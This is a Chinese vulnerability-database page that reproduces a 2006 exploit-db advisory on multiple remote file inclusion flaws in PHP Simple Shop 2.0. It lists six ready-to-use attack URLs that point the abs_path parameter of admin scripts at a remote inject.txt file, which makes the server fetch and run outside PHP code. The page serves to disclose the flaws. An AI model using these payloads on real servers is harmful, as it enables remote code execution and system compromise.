TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055852 漏洞类型
发布时间 2006-08-07 更新时间 2006-08-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28349
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/19382/info

PHP Simple Shop is prone to multiple remote file-include vulnerabilities. 

An attacker can exploit these issues to execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. 

Version 2.0 is vulnerable; other versions may also be affected.

http://www.example.com/[phpsimpleshop_path]/admin/index.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/adminindex.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/adminglobal.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/login.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/menu.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/header.php?abs_path=http://www.example2.com/inject.txt?